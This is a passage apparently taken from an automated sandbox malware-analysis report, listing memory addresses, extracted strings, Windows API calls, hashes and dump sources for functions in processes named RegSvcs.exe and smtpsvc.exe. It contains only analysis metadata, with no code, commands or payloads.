0x00564871
0x00564873
0x00564875
0x00564877
0x00564879
0x0056487b
0x0056487c
0x00564883
0x00564885
0x00564888
0x0056488a
0x0056488a
0x0056488c
0x0056488e
0x00564890
0x00564893
0x00564894
0x00564896
0x00564897
0x00564899
0x00564899
0x0056489b
0x0056489e
0x005648a0
0x005648a0
0x005648a0
0x0056489b
0x005648a5
0x005648a7
0x005648ad
0x005648ae
0x005648af
0x005648b1
0x005648b1
0x005648b3
0x005648b5
0x005648b7
0x005648b9
0x005648b9
0x005648bc
0x005648bc
0x005648be
0x005648c0
0x005648c6
0x005648c8
0x005648c8
0x005648ca
0x005648cc
0x005648ce
0x005648cf
0x005648d0
0x005648d1
0x005648d3
0x005648d5
0x005648d8
0x005648d8
0x005648d8
0x005648da
0x005648db
0x005648de
0x005648e4
0x005648e9
0x005648ee
0x005648f4
0x005648f7
0x005648f9
0x005648fb
0x005648fc
0x005648fe
0x00564901
0x00564902
0x00564904
0x00564906
0x00564907
0x00564909
0x0056490b
0x0056490d
0x0056490e
0x00564911
0x00564912
0x00564914
0x00564916
0x00564919
0x0056491b
0x0056491d
0x0056491f
0x0056491f
0x00564921
0x00564924
0x00564926
0x00564926
0x00564926
0x00564928
0x0056492a
0x0056492b
0x0056492b
0x0056492d
0x0056492f
0x00564935
0x00564937
0x00564937
0x00564937
0x00564938
0x0056493b
0x0056493d
0x00564941
0x00564943
0x00564945
0x00564947
0x00564949
0x0056494a
0x00564950
0x00564954
0x0056495d
0x00564960
0x00564961
0x00564962
0x00564964
0x00564965
0x00564966
0x00564969
0x0056496b
0x0056496d
0x0056496e
0x0056496f
0x00564972
0x00564974
0x00564976
0x00564979
0x0056497b
0x0056497f
0x00564981
0x00564982
0x00564982
0x00564984
0x00564986
0x00564986
0x00564986
0x00564988
0x0056498a
0x0056498a
0x0056498d
0x0056498e
0x00564990
0x00564992
0x00564992
0x00564992
0x00564993
0x00564996
0x00564998
0x0056499d
0x005649a0
0x005649a2
0x005649a5
0x005649a6
0x005649aa
0x005649ad
0x005649ae
0x005649b1
0x005649b3
0x005649b5
0x005649b7
0x005649ba
0x005649bc
0x005649be
0x005649c1
0x005649c3
0x005649c7
0x005649c9
0x005649cc
0x005649ce
0x005649d0
0x005649d0
0x005649d2
0x005649d4
0x005649d4
0x005649d4
0x005649d5
0x005649d8
0x005649da
0x005649df
0x005649e2
0x005649e4
0x005649ea
0x005649ed
0x005649ee
0x005649f0
0x005649f1
0x005649f2
0x005649f3
0x005649f6
0x005649f8
0x005649f9
0x005649fb
0x005649fe
0x00564a00
0x00564a02
0x00564a03
0x00564a04
0x00564a06
0x00564a0b
0x00564a0f
0x00564a11
0x00564a14
0x00564a1c
0x00564a1d
0x00564a1f
0x00564a24
0x00564a27
0x00564a29
0x00564a2f
0x00564a32
0x00564a33
0x00564a35
0x00564a36
0x00564a37
0x00564a38
0x00564a3b
0x00564a3d
0x00564a45
0x00564a47
0x00564a49
0x00564a4e
0x00564a50
0x00564a55
0x00564a57
0x00564a57
0x00564a59
0x00564a5a
0x00564a5c
0x00564a5e
0x00564a60
0x00564a60
0x00564a61
0x00564a63
0x00564a65
0x00564a65
0x00564a65
0x00564a67
0x00564a69
0x00564a6a
0x00564a6a
0x00564a6c
0x00564a6e
0x00564a70
0x00564a72
0x00564a72
0x00564a73
0x00564a73
0x005641c7
0x005641c7
0x005641cb
0x005641d0
0x005641d1
0x005641d3
0x005641d4
0x005641d4
0x005641c4
0x00000000

Memory Dump Source

Source File: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, Offset: 00560000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2538c29bd625c38f057775a0a92e2af5041197f58357eb6944769712b7355a5f
Instruction ID: 8c9879e7f1882200d69a88ce70fa79b61bb717ec26b8b9f2c0641ed4ed25fa02
Opcode Fuzzy Hash: 2538c29bd625c38f057775a0a92e2af5041197f58357eb6944769712b7355a5f
Instruction Fuzzy Hash: 1C31591500E7C26FC7134B349DB5AE2BF75AE63204B1E85C7D0C08F4A3E2255959C762

Uniqueness

Uniqueness Score: -1.00%

Function 0038F580, Relevance: 14.2, Strings: 11, Instructions: 470COMMON

Download Yara Rule

Strings

h8Vq, xrefs: 0038F723
PUq, xrefs: 0038FA05
:@/q, xrefs: 0038FA97
:@/q, xrefs: 0038FAB5
h8Vq, xrefs: 0038F72D
HVq, xrefs: 0038F97C
_4q, xrefs: 0038F7D0
lUq, xrefs: 0038F906
lUq, xrefs: 0038F910
HVq, xrefs: 0038F970
PUq, xrefs: 0038FA0F

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: _4q$:@/q$:@/q$HVq$HVq$PUq$PUq$h8Vq$h8Vq$lUq$lUq
API String ID: 0-4018766202
Opcode ID: 94f1d6c609d2f34b5312c89324008752676388b4d2e942d6d251a28c295dae11
Instruction ID: 16d11ae971b85d3175f76dadfff06e35157e0a911f0e76c2858429e5e69abb78
Opcode Fuzzy Hash: 94f1d6c609d2f34b5312c89324008752676388b4d2e942d6d251a28c295dae11
Instruction Fuzzy Hash: DD124D34A00204DFC719EF68C084A6977F6FF89715F2685ADE8469B769CB74AD80CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00380DDB, Relevance: 9.0, Strings: 7, Instructions: 249COMMON

Download Yara Rule

Strings

h8Vq, xrefs: 00380E80
HVq, xrefs: 00381028
<WTq, xrefs: 00380E2D
PUq, xrefs: 003810B5
:@/q, xrefs: 00381113
_4q, xrefs: 00380EF2
lUq, xrefs: 00380FD6

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: _4q$:@/q$<WTq$HVq$PUq$h8Vq$lUq
API String ID: 0-3834201401
Opcode ID: 450c13662325eaeccf0e13befd234c7eea85077fc3f8ac3bf0838925cdec87ea
Instruction ID: 4602c560c0ce114a9cf6e9fa2da5cda096731e5cc7bb7ad9336e7d6e3fd647eb
Opcode Fuzzy Hash: 450c13662325eaeccf0e13befd234c7eea85077fc3f8ac3bf0838925cdec87ea
Instruction Fuzzy Hash: FCB1FB70646345CFE368EF34C25176AB7E2FBC9704F10592DE5898B3A9EB719841CB42

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exe PID: 1268 Parent PID: 684 RegSvcs.exeCOMMON

Executed Functions

Function 004A00E8, Relevance: 2.7, Strings: 2, Instructions: 194COMMON

Download Yara Rule

Strings

\,+, xrefs: 004A0221
:@/q, xrefs: 004A029B

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID: :@/q$\,+
API String ID: 0-3625444970
Opcode ID: b2bee6dd0b22a2f25f9cb57b3106e7ddeabe34c38ff462e36f0649360fe9212f
Instruction ID: b8cea6d61b61ed21e7d0b54965adf0bafc6b8aa58caa541a7f73a88a266d4c6b
Opcode Fuzzy Hash: b2bee6dd0b22a2f25f9cb57b3106e7ddeabe34c38ff462e36f0649360fe9212f
Instruction Fuzzy Hash: F6719F30A00101CFDB08EB28E45CB6A7BE3BB9A345F158569D8069B3A9DB76DC40CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004A03E2, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

H-Tq, xrefs: 004A042F
H-Tq, xrefs: 004A044C

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID: H-Tq$H-Tq
API String ID: 0-1433740457
Opcode ID: a7b784ce6330ea5ddf9a6e2eb4a8fa341657af0f16cfd0cb4e770470108b8328
Instruction ID: e6639908b7610cdd17bb237993443b72d16a6bd537bfc523bd3491ae99419e4e
Opcode Fuzzy Hash: a7b784ce6330ea5ddf9a6e2eb4a8fa341657af0f16cfd0cb4e770470108b8328
Instruction Fuzzy Hash: DD416170E01315CBEB19EF74C4597AE7AB1AF65708F24446EC402AB390CF798886CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004A0F47, Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

\,+, xrefs: 004A0F8D
\,+, xrefs: 004A0F9F

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID: \,+$\,+
API String ID: 0-1612577462
Opcode ID: 5c9b79ee0469e363944e5aa925a8629404af53aab2d4e8c07c69af1f58ea8bf8
Instruction ID: fc0ae3ba0d72f9cf1eece7c886b4c93a59f37d16c3a24dded97aaead4da1fc91
Opcode Fuzzy Hash: 5c9b79ee0469e363944e5aa925a8629404af53aab2d4e8c07c69af1f58ea8bf8
Instruction Fuzzy Hash: 0221F271A092949FCB05EB74A85069E3FB6AF92604F1940EAC405DB696CA784D06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0022A587, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000E40,?,?), ref: 0022A63A

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 27a2234c1f4401692328b70d20e5596466cffb67ee36dba6e338621194e79871
Instruction ID: 5cb434068846e052fc56b3a2e60ec6f0c56688c368b7f488c329712f2f0beb6f
Opcode Fuzzy Hash: 27a2234c1f4401692328b70d20e5596466cffb67ee36dba6e338621194e79871
Instruction Fuzzy Hash: 6F317F7250D3C16FE3138B259C55B62BFB4AF43614F1A81DBD8848F193D225A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0022A4AA, Relevance: 1.6, APIs: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,8702ED9E,00000000,00000000,00000000,00000000), ref: 0022A53D

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 9626edc679616df2b17ae13c3c3603ee845d358c0122b3d14130f82557627103
Instruction ID: 30e16e1fc5fd998d368272b5b09d5711ef5d57c30da6acfde51b2aa79e1c6a55
Opcode Fuzzy Hash: 9626edc679616df2b17ae13c3c3603ee845d358c0122b3d14130f82557627103
Instruction Fuzzy Hash: CE21B571409380AFE7228F65DC44F96BFB8EF06310F0885DBE9849F193C225A919DB72

Uniqueness

Uniqueness Score: -1.00%

Function 0022A5C6, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000E40,?,?), ref: 0022A63A

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: ae97a25b2876fe2751b4d52bcb8796fff4431886b218d3d72d8ad22f8a4b30cd
Instruction ID: 7c3c7189b698a0ca8b89dfc92ac86d2c6b7484aee53c874b44a88072b3566a07
Opcode Fuzzy Hash: ae97a25b2876fe2751b4d52bcb8796fff4431886b218d3d72d8ad22f8a4b30cd
Instruction Fuzzy Hash: 6E110471504340AFD311CB15DC41F66BFF8EF85620F0885AAED489B642D275B925CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0022A1F4, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0022A269

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 6a76b087e7fb3dbde9c49d21b23c933f965255313ba0778c8673afadacc8a6e9
Instruction ID: cdbe6df46ec19ee86cca9f4a8ac2954a26cacb76271c803c3124d0191f7eb98b
Opcode Fuzzy Hash: 6a76b087e7fb3dbde9c49d21b23c933f965255313ba0778c8673afadacc8a6e9
Instruction Fuzzy Hash: CC216D7140E7C0AFD7138B659C95692BFB4EF03220F0A81DBDD848F1A3D2699919CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0022A4DE, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,8702ED9E,00000000,00000000,00000000,00000000), ref: 0022A53D

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 0e95d3ae3fde3c50c799fe11e4a7fc1e0e783f4082cd136467100c79938ff571
Instruction ID: 0c14aba66afa262c282eae8dc733282d15362248c0b1f4a748bcf30a50957e48
Opcode Fuzzy Hash: 0e95d3ae3fde3c50c799fe11e4a7fc1e0e783f4082cd136467100c79938ff571
Instruction Fuzzy Hash: 8811C471400300EFFB21CF95EC44F6BFBA8EF44320F14859AE9499A551C274E554DB72

Uniqueness

Uniqueness Score: -1.00%

Function 0022A2A3, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 0022A2FC

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: 672083b8c7c6a63f52ae0099a7819407d4e3507fc5b1b697d552fbc0af56770a
Instruction ID: 9147bad3e9922072195c115ff5935f5f250f1554d6bc88a063bac98cb68f8fdc
Opcode Fuzzy Hash: 672083b8c7c6a63f52ae0099a7819407d4e3507fc5b1b697d552fbc0af56770a
Instruction Fuzzy Hash: D911A0715093C0AFD7128B25DC45A52BFB4EF06320F0984DBED898B663C275A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0022A5EA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000E40,?,?), ref: 0022A63A

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: cb9f63b4791724229c460bd4b8b8810d6eec5406fe62f44be922cdcc8f587690
Instruction ID: 7c0b1b10f98e69aa4bc9b9dd37a68715cf63569a2d8c7d892fd5a43051a33b08
Opcode Fuzzy Hash: cb9f63b4791724229c460bd4b8b8810d6eec5406fe62f44be922cdcc8f587690
Instruction Fuzzy Hash: EA017171900601AFE310DF16DD45B26FBA8FB84A20F14856AED089B741D275F525CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 0022A2CA, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 0022A2FC

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: 23551128d73f72b7d0ecdf20989368aa7b8550edec7048bd021e29b23e93d2d4
Instruction ID: 2c772e912841c4582329d95d4b49dcb87e84eb4e54f3ed379e1b75ee1e075d3e
Opcode Fuzzy Hash: 23551128d73f72b7d0ecdf20989368aa7b8550edec7048bd021e29b23e93d2d4
Instruction Fuzzy Hash: 2D01F435510340EFEB10CF15E889765FB90EF00320F08C0EADD0D8BB52D2B5E864DA62

Uniqueness

Uniqueness Score: -1.00%

Function 0022A23A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0022A269

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: aba8f75968c4b7d3a759780fa42e725f36495b7a4b8a108024235dbe6b564b77
Instruction ID: 5106b9b654bea31eaf320d78a0a5c59f7621a128c31937d5a0390685b0737919
Opcode Fuzzy Hash: aba8f75968c4b7d3a759780fa42e725f36495b7a4b8a108024235dbe6b564b77
Instruction Fuzzy Hash: D3F0C231915340EFEB10CF45E989761FB90EB00720F18C1EADD0D4B612D2B6A954CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 004A1150, Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

:@/q, xrefs: 004A1386

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: d1273bd3a074079a4b13ead301e6c1a74b8e00124fe034dcbac934f8555be549
Instruction ID: 17dcfd45082509f54d4b42e8b67b6fbc04f36af18e5986873f92e058aaced6d5
Opcode Fuzzy Hash: d1273bd3a074079a4b13ead301e6c1a74b8e00124fe034dcbac934f8555be549
Instruction Fuzzy Hash: BC816034B002119FEB18EBA9C454B6FB7E7AFD8300F298469E4099B7A4DE35DC45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004A1140, Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

:@/q, xrefs: 004A1386

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: bfc0490d9f11b03fcb658650d16429897b4187f534b147d27ffca731a6b4ca9f
Instruction ID: 996411e4edbbeac0e7d773167970eb30c1e26b73aa750ffe037af254025e294c
Opcode Fuzzy Hash: bfc0490d9f11b03fcb658650d16429897b4187f534b147d27ffca731a6b4ca9f
Instruction Fuzzy Hash: 60616E30B002018FEB04EBA9C454B6FB7F6EF99300F19406AE5059B7A5DB39DC45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004A06B9, Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

D9Vq, xrefs: 004A0796

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: 1f7da294dd173c493399c05a38bd42f17d27c6f358d1a49388b9f19435a132bb
Instruction ID: 009d64e45ec1c6bcd89017bbef87464a196e9d05bcf7970d7e06173e85a93b93
Opcode Fuzzy Hash: 1f7da294dd173c493399c05a38bd42f17d27c6f358d1a49388b9f19435a132bb
Instruction Fuzzy Hash: F1311A343052128FDB59AB78C028A6D37E2AFD6311B1404BDD40ACF7A6DE3ADC469B91

Uniqueness

Uniqueness Score: -1.00%

Function 004A06C8, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

D9Vq, xrefs: 004A0796

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: bb5cab26373687e6254247447e291b2d617e4d92c4ca7e4f203d4462f221d4cc
Instruction ID: 78019d1575e304eaafa8b9e652ec59e80b03adfd80e2a22497957e8f2be5c8ff
Opcode Fuzzy Hash: bb5cab26373687e6254247447e291b2d617e4d92c4ca7e4f203d4462f221d4cc
Instruction Fuzzy Hash: 3D213B343012128FDB5DAB78D028B6D36E2AFD5711B2404BDD40ACF7A5EE3ADC469B81

Uniqueness

Uniqueness Score: -1.00%

Function 0022A336, Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0022A39C

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 392a429f1b7c1db0a3f886b5f428c8439868e205a80e8f4b83516d2f9de96eb9
Instruction ID: 7422bea234ba1968086cd80e3741bf440104190eb07ce40c23a6d16b85c31aa5
Opcode Fuzzy Hash: 392a429f1b7c1db0a3f886b5f428c8439868e205a80e8f4b83516d2f9de96eb9
Instruction Fuzzy Hash: DD219D715093C0AFD7128F24DC45A52BFB4EF02220F0984EBED89CF163C278A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0022A36A, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0022A39C

Memory Dump Source

Source File: 0000000C.00000002.468232134.000000000022A000.00000040.00000001.sdmp, Offset: 0022A000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ca1afcf2a2d2b30736547b89485fae90a471db5b6dbe28d20baefd454022cb09
Instruction ID: e8de01856b2c33e7eb1b29b31cda6578848287718aa65f56b719c1cba463acc6
Opcode Fuzzy Hash: ca1afcf2a2d2b30736547b89485fae90a471db5b6dbe28d20baefd454022cb09
Instruction Fuzzy Hash: 8D01F235511340EFEB20CF65E888769FB94EF00320F08C4EAEC0D8B602D2B4E854DA62

Uniqueness

Uniqueness Score: -1.00%

Function 00A107F8, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468557791.0000000000A10000.00000040.00000040.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055aae253b2d32c06483ce78aef6c854aa42219939221d374f86a586b6860a92
Instruction ID: 8895095d1af36ddb016ffbd994685e837d11a172818c67959dd56669742b37b4
Opcode Fuzzy Hash: 055aae253b2d32c06483ce78aef6c854aa42219939221d374f86a586b6860a92
Instruction Fuzzy Hash: FA018B765497809FD7128F15EC40862FFF8EF46620709C0AFEC4D8B612D225A905C772

Uniqueness

Uniqueness Score: -1.00%

Function 004A1040, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a9690ba507fc7c5349c12f2546910ca8f753ae8062b6d43137b7ada3287145
Instruction ID: b9f288efd1c1395f179f4170fcddb82a33d9d78f9bef2df57574cd093879ce64
Opcode Fuzzy Hash: 88a9690ba507fc7c5349c12f2546910ca8f753ae8062b6d43137b7ada3287145
Instruction Fuzzy Hash: 67F0E932300110ABD714A6BA9C01FA777D9EBD9B60F144466F709CB690DEA2DC419794

Uniqueness

Uniqueness Score: -1.00%

Function 004A1030, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5c5892859beeb83cf1d2eea403466a4c5136d998eb09575e8833e92b7474141
Instruction ID: d5ef56e0615b82fa236ebbe018ec082e57bac531966b5fcdf13215e664d1b45e
Opcode Fuzzy Hash: a5c5892859beeb83cf1d2eea403466a4c5136d998eb09575e8833e92b7474141
Instruction Fuzzy Hash: 02F09E313482906FD72097765C41FA73BC59FD1B10F18446FEA05DB282DDA1CC428B54

Uniqueness

Uniqueness Score: -1.00%

Function 004A0EF0, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720087fb67e6394132ee8fe4f45dbd43f36e1fee389cd37816553168b9be75bf
Instruction ID: ae87ce1e0041d63159c4c93836819a6fc6b3f888b4df365ff2d83d1a83c19c87
Opcode Fuzzy Hash: 720087fb67e6394132ee8fe4f45dbd43f36e1fee389cd37816553168b9be75bf
Instruction Fuzzy Hash: EDF0A7342051508FC715EB78E4A88D93BF6EF8A25531545EBD409C737ACA308C49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A1081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468557791.0000000000A10000.00000040.00000040.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f70d4b44cf93e713d0cb9d947e3ef19c2fe369eca3374009c018ba4c42246592
Instruction ID: bed2f759fa2a3160dba8a3a9ff5a900fb1abcc132fff5da8d52fc05c9a550013
Opcode Fuzzy Hash: f70d4b44cf93e713d0cb9d947e3ef19c2fe369eca3374009c018ba4c42246592
Instruction Fuzzy Hash: D4E092766417049BD650CF0AFC41452F7D4EB84A30B08C07FDC0D8B711D136B505CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 004A0F00, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2df57a8509cb8f3007a56ecbf87a031040b5397d666dc79023091561025601e
Instruction ID: 6640ac6e647e1afd2246cb40717b1e4acf781e3ec2ac186c683299751de55afd
Opcode Fuzzy Hash: f2df57a8509cb8f3007a56ecbf87a031040b5397d666dc79023091561025601e
Instruction Fuzzy Hash: 0DE01A357000208FC754FBBCE4A899A33EAEB8926531155AAE409C7328DB71EC48CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 004A00A8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f46b005e9ea0eac1147e042c374bfe33a9574482340e3fbff8244fa508d1b77c
Instruction ID: 26d5bbe1275a78834b8e7afee87bb75f46069d32c2ef5df6e2b667c8bdd45267
Opcode Fuzzy Hash: f46b005e9ea0eac1147e042c374bfe33a9574482340e3fbff8244fa508d1b77c
Instruction Fuzzy Hash: F9E092B1E1521E9F8F40EFB9A9495DFFFF8EA49350F20056AD609F3200E2355A118BE5

Uniqueness

Uniqueness Score: -1.00%

Function 004A10B0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b140fdaec33de90902afc39c380e6650fc8e9e9e00512dc980374d3d9af53410
Instruction ID: e44acd925b3191be09eac78d51ff878a66ee95b5dff753bc293268e36fe0c362
Opcode Fuzzy Hash: b140fdaec33de90902afc39c380e6650fc8e9e9e00512dc980374d3d9af53410
Instruction Fuzzy Hash: 60E0B6B1D052099ECB80EFBA98456DFBFF8EB49250F504577D108E3200E23592558BE2

Uniqueness

Uniqueness Score: -1.00%

Function 004A0F58, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468404994.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbbb90d072d8822bbb1b6010f56e253b9ef848ec0fc9864ce79f8964961eefdf
Instruction ID: 509de2cc97aca865bda54eaf2d9d3afb4a85fa13c1c6151d95bf4c308ecfc33a
Opcode Fuzzy Hash: bbbb90d072d8822bbb1b6010f56e253b9ef848ec0fc9864ce79f8964961eefdf
Instruction Fuzzy Hash: AFD05E31B102149BC724BB69F809A9A7BACAF46751F4000A5E9049B254DBB2DC1487D1

Uniqueness

Uniqueness Score: -1.00%

Function 002223F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468227133.0000000000222000.00000040.00000001.sdmp, Offset: 00222000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5caa1de5f72a6797f6afeaa1e9601ec6769a7fc61da9fafa1fb293ece455229
Instruction ID: 91e06ed8b320bd34fa8954e7911ea644454d1fb762e55014ad943cf374af0bb8
Opcode Fuzzy Hash: a5caa1de5f72a6797f6afeaa1e9601ec6769a7fc61da9fafa1fb293ece455229
Instruction Fuzzy Hash: D1D02E78204AA2AFD3129F0CD1A4B8437D0AB40B00F0600FAA800CB2B3C368D880D200

Uniqueness

Uniqueness Score: -1.00%

Function 002223BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.468227133.0000000000222000.00000040.00000001.sdmp, Offset: 00222000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68669ba90e0bd945556a9029ad9bb62b1fede4aa54c04fb9fcecedd47d595bde
Instruction ID: bc97b44dea6ea616122b1d9cb65d7f76370721ee147eff8e13d2a917e6c1a6dd
Opcode Fuzzy Hash: 68669ba90e0bd945556a9029ad9bb62b1fede4aa54c04fb9fcecedd47d595bde
Instruction Fuzzy Hash: 88D05E343106829BD719CF0CD294F5973E4AF40700F0644E8BC108B266C3B9DC94D600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: smtpsvc.exe PID: 3048 Parent PID: 684 smtpsvc.exeCOMMON

Executed Functions

Function 004003E2, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

H-Tq, xrefs: 0040044C
